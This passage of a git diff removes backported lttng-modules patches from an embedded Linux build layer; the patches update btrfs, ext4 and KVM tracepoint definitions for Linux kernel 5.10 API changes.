65+ LTTNG_KERNEL_RANGE(5,9,6, 5,10,0) || \
66+ LTTNG_KERNEL_RANGE(5,4,78, 5,5,0))
67+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
68+
69+ btrfs_find_free_extent,
70+
71+ TP_PROTO(const struct btrfs_root *root, u64 num_bytes, u64 empty_size,
72+ u64 data),
73+
74+ TP_ARGS(root, num_bytes, empty_size, data),
75+
76+ TP_FIELDS(
77+ ctf_array(u8, fsid, root->lttng_fs_info_fsid, BTRFS_UUID_SIZE)
78+ ctf_integer(u64, root_objectid, root->root_key.objectid)
79+ ctf_integer(u64, num_bytes, num_bytes)
80+ ctf_integer(u64, empty_size, empty_size)
81+ ctf_integer(u64, data, data)
82+ )
83+)
84+
85+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0))
86+
87 LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
88
89 btrfs_find_free_extent,
90@@ -1874,6 +1896,105 @@ LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
91 )
92 )
93
94+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,18,0))
95+
96+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
97+
98+ btrfs_find_free_extent,
99+
100+ TP_PROTO(const struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
101+ u64 data),
102+
103+ TP_ARGS(fs_info, num_bytes, empty_size, data),
104+
105+ TP_FIELDS(
106+ ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
107+ ctf_integer(u64, num_bytes, num_bytes)
108+ ctf_integer(u64, empty_size, empty_size)
109+ ctf_integer(u64, data, data)
110+ )
111+)
112+
113+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0))
114+
115+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
116+
117+ btrfs_find_free_extent,
118+
119+ TP_PROTO(const struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
120+ u64 data),
121+
122+ TP_ARGS(fs_info, num_bytes, empty_size, data),
123+
124+ TP_FIELDS(
125+ ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
126+ ctf_integer(u64, num_bytes, num_bytes)
127+ ctf_integer(u64, empty_size, empty_size)
128+ ctf_integer(u64, data, data)
129+ )
130+)
131+
132+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,10,0))
133+
134+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
135+
136+ btrfs_find_free_extent,
137+
138+ TP_PROTO(struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
139+ u64 data),
140+
141+ TP_ARGS(fs_info, num_bytes, empty_size, data),
142+
143+ TP_FIELDS(
144+ ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
145+ ctf_integer(u64, num_bytes, num_bytes)
146+ ctf_integer(u64, empty_size, empty_size)
147+ ctf_integer(u64, data, data)
148+ )
149+)
150+
151+#elif (LTTNG_SLE_KERNEL_RANGE(4,4,73,5,0,0, 4,4,73,6,0,0) || \
152+ LTTNG_SLE_KERNEL_RANGE(4,4,82,6,0,0, 4,4,82,7,0,0) || \
153+ LTTNG_SLE_KERNEL_RANGE(4,4,92,6,0,0, 4,4,92,7,0,0) || \
154+ LTTNG_SLE_KERNEL_RANGE(4,4,103,6,0,0, 4,5,0,0,0,0))
155+
156+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
157+
158+ btrfs_find_free_extent,
159+
160+ TP_PROTO(const struct btrfs_root *root, u64 num_bytes, u64 empty_size,
161+ u64 data),
162+
163+ TP_ARGS(root, num_bytes, empty_size, data),
164+
165+ TP_FIELDS(
166+ ctf_integer(u64, root_objectid, root->root_key.objectid)
167+ ctf_integer(u64, num_bytes, num_bytes)
168+ ctf_integer(u64, empty_size, empty_size)
169+ ctf_integer(u64, data, data)
170+ )
171+)
172+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(3,3,0))
173+
174+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
175+
176+ btrfs_find_free_extent,
177+
178+ TP_PROTO(struct btrfs_root *root, u64 num_bytes, u64 empty_size,
179+ u64 data),
180+
181+ TP_ARGS(root, num_bytes, empty_size, data),
182+
183+ TP_FIELDS(
184+ ctf_integer(u64, root_objectid, root->root_key.objectid)
185+ ctf_integer(u64, num_bytes, num_bytes)
186+ ctf_integer(u64, empty_size, empty_size)
187+ ctf_integer(u64, data, data)
188+ )
189+)
190+#endif
191+
192+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0))
193 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
194
195 TP_PROTO(const struct btrfs_block_group *block_group, u64 start,
196@@ -1907,22 +2028,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
197 )
198
199 #elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,18,0))
200-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
201-
202- btrfs_find_free_extent,
203-
204- TP_PROTO(const struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
205- u64 data),
206-
207- TP_ARGS(fs_info, num_bytes, empty_size, data),
208-
209- TP_FIELDS(
210- ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
211- ctf_integer(u64, num_bytes, num_bytes)
212- ctf_integer(u64, empty_size, empty_size)
213- ctf_integer(u64, data, data)
214- )
215-)
216
217 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
218
219@@ -1957,22 +2062,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
220 )
221
222 #elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0))
223-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
224-
225- btrfs_find_free_extent,
226-
227- TP_PROTO(const struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
228- u64 data),
229-
230- TP_ARGS(fs_info, num_bytes, empty_size, data),
231-
232- TP_FIELDS(
233- ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
234- ctf_integer(u64, num_bytes, num_bytes)
235- ctf_integer(u64, empty_size, empty_size)
236- ctf_integer(u64, data, data)
237- )
238-)
239
240 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
241
242@@ -2011,23 +2100,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
243
244 #elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,10,0))
245
246-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
247-
248- btrfs_find_free_extent,
249-
250- TP_PROTO(struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
251- u64 data),
252-
253- TP_ARGS(fs_info, num_bytes, empty_size, data),
254-
255- TP_FIELDS(
256- ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
257- ctf_integer(u64, num_bytes, num_bytes)
258- ctf_integer(u64, empty_size, empty_size)
259- ctf_integer(u64, data, data)
260- )
261-)
262-
263 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
264
265 TP_PROTO(struct btrfs_fs_info *fs_info,
266@@ -2066,23 +2138,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
267 LTTNG_SLE_KERNEL_RANGE(4,4,92,6,0,0, 4,4,92,7,0,0) || \
268 LTTNG_SLE_KERNEL_RANGE(4,4,103,6,0,0, 4,5,0,0,0,0))
269
270-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
271-
272- btrfs_find_free_extent,
273-
274- TP_PROTO(const struct btrfs_root *root, u64 num_bytes, u64 empty_size,
275- u64 data),
276-
277- TP_ARGS(root, num_bytes, empty_size, data),
278-
279- TP_FIELDS(
280- ctf_integer(u64, root_objectid, root->root_key.objectid)
281- ctf_integer(u64, num_bytes, num_bytes)
282- ctf_integer(u64, empty_size, empty_size)
283- ctf_integer(u64, data, data)
284- )
285-)
286-
287 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
288
289 TP_PROTO(const struct btrfs_root *root,
290@@ -2120,23 +2175,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
291
292 #elif (LINUX_VERSION_CODE >= KERNEL_VERSION(3,3,0))
293
294-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
295-
296- btrfs_find_free_extent,
297-
298- TP_PROTO(struct btrfs_root *root, u64 num_bytes, u64 empty_size,
299- u64 data),
300-
301- TP_ARGS(root, num_bytes, empty_size, data),
302-
303- TP_FIELDS(
304- ctf_integer(u64, root_objectid, root->root_key.objectid)
305- ctf_integer(u64, num_bytes, num_bytes)
306- ctf_integer(u64, empty_size, empty_size)
307- ctf_integer(u64, data, data)
308- )
309-)
310-
311 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
312
313 TP_PROTO(struct btrfs_root *root,
314--
3152.25.1
316
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0004-fix-btrfs-make-ordered-extent-tracepoint-take-btrfs_.patch b/meta/recipes-kernel/lttng/lttng-modules/0004-fix-btrfs-make-ordered-extent-tracepoint-take-btrfs_.patch
deleted file mode 100644
index 67025418c3..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0004-fix-btrfs-make-ordered-extent-tracepoint-take-btrfs_.patch
+++ /dev/null
@@ -1,179 +0,0 @@
1From d51a3332909ff034c8ec16ead0090bd6a4e2bc38 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Tue, 27 Oct 2020 12:10:05 -0400
4Subject: [PATCH 04/16] fix: btrfs: make ordered extent tracepoint take
5 btrfs_inode (v5.10)
6
7See upstream commit :
8
9 commit acbf1dd0fcbd10c67826a19958f55a053b32f532
10 Author: Nikolay Borisov <nborisov@suse.com>
11 Date: Mon Aug 31 14:42:40 2020 +0300
12
13 btrfs: make ordered extent tracepoint take btrfs_inode
14
15Upstream-Status: Backport
16
17Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
18Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
19Change-Id: I096d0801ffe0ad826cfe414cdd1c0857cbd2b624
20---
21 instrumentation/events/lttng-module/btrfs.h | 120 +++++++++++++++-----
22 1 file changed, 90 insertions(+), 30 deletions(-)
23
24diff --git a/instrumentation/events/lttng-module/btrfs.h b/instrumentation/events/lttng-module/btrfs.h
25index 52fcfd0d..d47f3280 100644
26--- a/instrumentation/events/lttng-module/btrfs.h
27+++ b/instrumentation/events/lttng-module/btrfs.h
28@@ -346,7 +346,29 @@ LTTNG_TRACEPOINT_EVENT(btrfs_handle_em_exist,
29 )
30 #endif
31
32-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,6,0))
33+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
34+LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__ordered_extent,
35+
36+ TP_PROTO(const struct btrfs_inode *inode,
37+ const struct btrfs_ordered_extent *ordered),
38+
39+ TP_ARGS(inode, ordered),
40+
41+ TP_FIELDS(
42+ ctf_array(u8, fsid, inode->root->lttng_fs_info_fsid, BTRFS_UUID_SIZE)
43+ ctf_integer(ino_t, ino, btrfs_ino(inode))
44+ ctf_integer(u64, file_offset, ordered->file_offset)
45+ ctf_integer(u64, start, ordered->disk_bytenr)
46+ ctf_integer(u64, len, ordered->num_bytes)
47+ ctf_integer(u64, disk_len, ordered->disk_num_bytes)
48+ ctf_integer(u64, bytes_left, ordered->bytes_left)
49+ ctf_integer(unsigned long, flags, ordered->flags)
50+ ctf_integer(int, compress_type, ordered->compress_type)
51+ ctf_integer(int, refs, refcount_read(&ordered->refs))
52+ ctf_integer(u64, root_objectid, inode->root->root_key.objectid)
53+ )
54+)
55+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(5,6,0))
56 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__ordered_extent,
57
58 TP_PROTO(const struct inode *inode,
59@@ -458,7 +480,39 @@ LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__ordered_extent,
60 )
61 #endif
62
63-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0) || \
64+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
65+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_add,
66+
67+ TP_PROTO(const struct btrfs_inode *inode,
68+ const struct btrfs_ordered_extent *ordered),
69+
70+ TP_ARGS(inode, ordered)
71+)
72+
73+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_remove,
74+
75+ TP_PROTO(const struct btrfs_inode *inode,
76+ const struct btrfs_ordered_extent *ordered),
77+
78+ TP_ARGS(inode, ordered)
79+)
80+
81+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_start,
82+
83+ TP_PROTO(const struct btrfs_inode *inode,
84+ const struct btrfs_ordered_extent *ordered),
85+
86+ TP_ARGS(inode, ordered)
87+)
88+
89+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_put,
90+
91+ TP_PROTO(const struct btrfs_inode *inode,
92+ const struct btrfs_ordered_extent *ordered),
93+
94+ TP_ARGS(inode, ordered)
95+)
96+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0) || \
97 LTTNG_SLE_KERNEL_RANGE(4,4,73,5,0,0, 4,4,73,6,0,0) || \
98 LTTNG_SLE_KERNEL_RANGE(4,4,82,6,0,0, 4,4,82,7,0,0) || \
99 LTTNG_SLE_KERNEL_RANGE(4,4,92,6,0,0, 4,4,92,7,0,0) || \
100@@ -494,7 +548,41 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_put,
101
102 TP_ARGS(inode, ordered)
103 )
104+#else
105+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_add,
106+
107+ TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
108+
109+ TP_ARGS(inode, ordered)
110+)
111+
112+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_remove,
113+
114+ TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
115+
116+ TP_ARGS(inode, ordered)
117+)
118+
119+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_start,
120+
121+ TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
122+
123+ TP_ARGS(inode, ordered)
124+)
125
126+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_put,
127+
128+ TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
129+
130+ TP_ARGS(inode, ordered)
131+)
132+#endif
133+
134+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0) || \
135+ LTTNG_SLE_KERNEL_RANGE(4,4,73,5,0,0, 4,4,73,6,0,0) || \
136+ LTTNG_SLE_KERNEL_RANGE(4,4,82,6,0,0, 4,4,82,7,0,0) || \
137+ LTTNG_SLE_KERNEL_RANGE(4,4,92,6,0,0, 4,4,92,7,0,0) || \
138+ LTTNG_SLE_KERNEL_RANGE(4,4,103,6,0,0, 4,5,0,0,0,0))
139 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__writepage,
140
141 TP_PROTO(const struct page *page, const struct inode *inode,
142@@ -563,34 +651,6 @@ LTTNG_TRACEPOINT_EVENT(btrfs_sync_file,
143 )
144 )
145 #else
146-LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_add,
147-
148- TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
149-
150- TP_ARGS(inode, ordered)
151-)
152-
153-LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_remove,
154-
155- TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
156-
157- TP_ARGS(inode, ordered)
158-)
159-
160-LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_start,
161-
162- TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
163-
164- TP_ARGS(inode, ordered)
165-)
166-
167-LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_put,
168-
169- TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
170-
171- TP_ARGS(inode, ordered)
172-)
173-
174 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__writepage,
175
176 TP_PROTO(struct page *page, struct inode *inode,
177--
1782.25.1
179
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0005-fix-ext4-fast-commit-recovery-path-v5.10.patch b/meta/recipes-kernel/lttng/lttng-modules/0005-fix-ext4-fast-commit-recovery-path-v5.10.patch
deleted file mode 100644
index 63d97fa4a3..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0005-fix-ext4-fast-commit-recovery-path-v5.10.patch
+++ /dev/null
@@ -1,91 +0,0 @@
1From b96f5364ba4d5a8b9e8159fe0b9e20d598a1c0f5 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 26 Oct 2020 17:03:23 -0400
4Subject: [PATCH 05/16] fix: ext4: fast commit recovery path (v5.10)
5
6See upstream commit :
7
8 commit 8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2
9 Author: Harshad Shirwadkar <harshadshirwadkar@gmail.com>
10 Date: Thu Oct 15 13:37:59 2020 -0700
11
12 ext4: fast commit recovery path
13
14 This patch adds fast commit recovery path support for Ext4 file
15 system. We add several helper functions that are similar in spirit to
16 e2fsprogs journal recovery path handlers. Example of such functions
17 include - a simple block allocator, idempotent block bitmap update
18 function etc. Using these routines and the fast commit log in the fast
19 commit area, the recovery path (ext4_fc_replay()) performs fast commit
20 log recovery.
21
22Upstream-Status: Backport
23
24Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
25Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
26Change-Id: Ia65cf44e108f2df0b458f0d335f33a8f18f50baa
27---
28 instrumentation/events/lttng-module/ext4.h | 40 ++++++++++++++++++++++
29 1 file changed, 40 insertions(+)
30
31diff --git a/instrumentation/events/lttng-module/ext4.h b/instrumentation/events/lttng-module/ext4.h
32index f9a55e29..5fddccad 100644
33--- a/instrumentation/events/lttng-module/ext4.h
34+++ b/instrumentation/events/lttng-module/ext4.h
35@@ -1423,6 +1423,18 @@ LTTNG_TRACEPOINT_EVENT(ext4_ext_load_extent,
36 )
37 )
38
39+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
40+LTTNG_TRACEPOINT_EVENT(ext4_load_inode,
41+ TP_PROTO(struct super_block *sb, unsigned long ino),
42+
43+ TP_ARGS(sb, ino),
44+
45+ TP_FIELDS(
46+ ctf_integer(dev_t, dev, sb->s_dev)
47+ ctf_integer(ino_t, ino, ino)
48+ )
49+)
50+#else
51 LTTNG_TRACEPOINT_EVENT(ext4_load_inode,
52 TP_PROTO(struct inode *inode),
53
54@@ -2045,6 +2057,34 @@ LTTNG_TRACEPOINT_EVENT(ext4_es_shrink_exit,
55
56 #endif
57
58+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
59+LTTNG_TRACEPOINT_EVENT(ext4_fc_replay_scan,
60+ TP_PROTO(struct super_block *sb, int error, int off),
61+
62+ TP_ARGS(sb, error, off),
63+
64+ TP_FIELDS(
65+ ctf_integer(dev_t, dev, sb->s_dev)
66+ ctf_integer(int, error, error)
67+ ctf_integer(int, off, off)
68+ )
69+)
70+
71+LTTNG_TRACEPOINT_EVENT(ext4_fc_replay,
72+ TP_PROTO(struct super_block *sb, int tag, int ino, int priv1, int priv2),
73+
74+ TP_ARGS(sb, tag, ino, priv1, priv2),
75+
76+ TP_FIELDS(
77+ ctf_integer(dev_t, dev, sb->s_dev)
78+ ctf_integer(int, tag, tag)
79+ ctf_integer(int, ino, ino)
80+ ctf_integer(int, priv1, priv1)
81+ ctf_integer(int, priv2, priv2)
82+ )
83+)
84+#endif
85+
86 #endif /* LTTNG_TRACE_EXT4_H */
87
88 /* This part must be outside protection */
89--
902.25.1
91
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0006-fix-KVM-x86-Add-intr-vectoring-info-and-error-code-t.patch b/meta/recipes-kernel/lttng/lttng-modules/0006-fix-KVM-x86-Add-intr-vectoring-info-and-error-code-t.patch
deleted file mode 100644
index 56c563cea3..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0006-fix-KVM-x86-Add-intr-vectoring-info-and-error-code-t.patch
+++ /dev/null
@@ -1,124 +0,0 @@
1From a6334775b763c187d84914e89a0b835a793ae0fd Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 26 Oct 2020 14:11:17 -0400
4Subject: [PATCH 06/16] fix: KVM: x86: Add intr/vectoring info and error code
5 to kvm_exit tracepoint (v5.10)
6
7See upstream commit :
8
9 commit 235ba74f008d2e0936b29f77f68d4e2f73ffd24a
10 Author: Sean Christopherson <sean.j.christopherson@intel.com>
11 Date: Wed Sep 23 13:13:46 2020 -0700
12
13 KVM: x86: Add intr/vectoring info and error code to kvm_exit tracepoint
14
15 Extend the kvm_exit tracepoint to align it with kvm_nested_vmexit in
16 terms of what information is captured. On SVM, add interrupt info and
17 error code, while on VMX it add IDT vectoring and error code. This
18 sets the stage for macrofying the kvm_exit tracepoint definition so that
19 it can be reused for kvm_nested_vmexit without loss of information.
20
21 Opportunistically stuff a zero for VM_EXIT_INTR_INFO if the VM-Enter
22 failed, as the field is guaranteed to be invalid. Note, it'd be
23 possible to further filter the interrupt/exception fields based on the
24 VM-Exit reason, but the helper is intended only for tracepoints, i.e.
25 an extra VMREAD or two is a non-issue, the failed VM-Enter case is just
26 low hanging fruit.
27
28Upstream-Status: Backport
29
30Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
31Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
32Change-Id: I638fa29ef7d8bb432de42a33f9ae4db43259b915
33---
34 .../events/lttng-module/arch/x86/kvm/trace.h | 55 ++++++++++++++++++-
35 1 file changed, 53 insertions(+), 2 deletions(-)
36
37diff --git a/instrumentation/events/lttng-module/arch/x86/kvm/trace.h b/instrumentation/events/lttng-module/arch/x86/kvm/trace.h
38index 4416ae02..0917b51f 100644
39--- a/instrumentation/events/lttng-module/arch/x86/kvm/trace.h
40+++ b/instrumentation/events/lttng-module/arch/x86/kvm/trace.h
41@@ -115,6 +115,37 @@ LTTNG_TRACEPOINT_EVENT_MAP(kvm_apic, kvm_x86_apic,
42 /*
43 * Tracepoint for kvm guest exit:
44 */
45+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
46+LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
47+ TP_PROTO(unsigned int exit_reason, struct kvm_vcpu *vcpu, u32 isa),
48+ TP_ARGS(exit_reason, vcpu, isa),
49+
50+ TP_locvar(
51+ u64 info1, info2;
52+ u32 intr_info, error_code;
53+ ),
54+
55+ TP_code_pre(
56+ kvm_x86_ops.get_exit_info(vcpu, &tp_locvar->info1,
57+ &tp_locvar->info2,
58+ &tp_locvar->intr_info,
59+ &tp_locvar->error_code);
60+ ),
61+
62+ TP_FIELDS(
63+ ctf_integer(unsigned int, exit_reason, exit_reason)
64+ ctf_integer(unsigned long, guest_rip, kvm_rip_read(vcpu))
65+ ctf_integer(u32, isa, isa)
66+ ctf_integer(u64, info1, tp_locvar->info1)
67+ ctf_integer(u64, info2, tp_locvar->info2)
68+ ctf_integer(u32, intr_info, tp_locvar->intr_info)
69+ ctf_integer(u32, error_code, tp_locvar->error_code)
70+ ctf_integer(unsigned int, vcpu_id, vcpu->vcpu_id)
71+ ),
72+
73+ TP_code_post()
74+)
75+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0))
76 LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
77 TP_PROTO(unsigned int exit_reason, struct kvm_vcpu *vcpu, u32 isa),
78 TP_ARGS(exit_reason, vcpu, isa),
79@@ -124,13 +155,32 @@ LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
80 ),
81
82 TP_code_pre(
83-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0))
84 kvm_x86_ops.get_exit_info(vcpu, &tp_locvar->info1,
85 &tp_locvar->info2);
86+ ),
87+
88+ TP_FIELDS(
89+ ctf_integer(unsigned int, exit_reason, exit_reason)
90+ ctf_integer(unsigned long, guest_rip, kvm_rip_read(vcpu))
91+ ctf_integer(u32, isa, isa)
92+ ctf_integer(u64, info1, tp_locvar->info1)
93+ ctf_integer(u64, info2, tp_locvar->info2)
94+ ),
95+
96+ TP_code_post()
97+)
98 #else
99+LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
100+ TP_PROTO(unsigned int exit_reason, struct kvm_vcpu *vcpu, u32 isa),
101+ TP_ARGS(exit_reason, vcpu, isa),
102+
103+ TP_locvar(
104+ u64 info1, info2;
105+ ),
106+
107+ TP_code_pre(
108 kvm_x86_ops->get_exit_info(vcpu, &tp_locvar->info1,
109 &tp_locvar->info2);
110-#endif
111 ),
112
113 TP_FIELDS(
114@@ -143,6 +193,7 @@ LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
115
116 TP_code_post()
117 )
118+#endif
119
120 /*
121 * Tracepoint for kvm interrupt injection:
122--
1232.25.1
124
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0007-fix-kvm-x86-mmu-Add-TDP-MMU-PF-handler-v5.10.patch b/meta/recipes-kernel/lttng/lttng-modules/0007-fix-kvm-x86-mmu-Add-TDP-MMU-PF-handler-v5.10.patch
deleted file mode 100644
index d78a8c25c7..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0007-fix-kvm-x86-mmu-Add-TDP-MMU-PF-handler-v5.10.patch
+++ /dev/null
@@ -1,82 +0,0 @@
1From 2f421c43c60b2c9d3ed63c1a363320e98a536a35 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 26 Oct 2020 14:28:35 -0400
4Subject: [PATCH 07/16] fix: kvm: x86/mmu: Add TDP MMU PF handler (v5.10)
5
6See upstream commit :
7
8 commit bb18842e21111a979e2e0e1c5d85c09646f18d51
9 Author: Ben Gardon <bgardon@google.com>
10 Date: Wed Oct 14 11:26:50 2020 -0700
11
12 kvm: x86/mmu: Add TDP MMU PF handler
13
14 Add functions to handle page faults in the TDP MMU. These page faults
15 are currently handled in much the same way as the x86 shadow paging
16 based MMU, however the ordering of some operations is slightly
17 different. Future patches will add eager NX splitting, a fast page fault
18 handler, and parallel page faults.
19
20 Tested by running kvm-unit-tests and KVM selftests on an Intel Haswell
21 machine. This series introduced no new failures.
22
23Upstream-Status: Backport
24
25Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
26Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
27Change-Id: Ie56959cb6c77913d2f1188b0ca15da9114623a4e
28---
29 .../lttng-module/arch/x86/kvm/mmutrace.h | 20 ++++++++++++++++++-
30 probes/lttng-probe-kvm-x86-mmu.c | 5 +++++
31 2 files changed, 24 insertions(+), 1 deletion(-)
32
33diff --git a/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h b/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
34index e5470400..86717835 100644
35--- a/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
36+++ b/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
37@@ -163,7 +163,25 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(kvm_mmu_page_class, kvm_mmu_prepare_zap_page,
38 TP_ARGS(sp)
39 )
40
41-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3,11,0))
42+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
43+
44+LTTNG_TRACEPOINT_EVENT_MAP(
45+ mark_mmio_spte,
46+
47+ kvm_mmu_mark_mmio_spte,
48+
49+ TP_PROTO(u64 *sptep, gfn_t gfn, u64 spte),
50+ TP_ARGS(sptep, gfn, spte),
51+
52+ TP_FIELDS(
53+ ctf_integer_hex(void *, sptep, sptep)
54+ ctf_integer(gfn_t, gfn, gfn)
55+ ctf_integer(unsigned, access, spte & ACC_ALL)
56+ ctf_integer(unsigned int, gen, get_mmio_spte_generation(spte))
57+ )
58+)
59+
60+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(3,11,0))
61
62 LTTNG_TRACEPOINT_EVENT_MAP(
63 mark_mmio_spte,
64diff --git a/probes/lttng-probe-kvm-x86-mmu.c b/probes/lttng-probe-kvm-x86-mmu.c
65index 8f981865..5043c776 100644
66--- a/probes/lttng-probe-kvm-x86-mmu.c
67+++ b/probes/lttng-probe-kvm-x86-mmu.c
68@@ -31,6 +31,11 @@
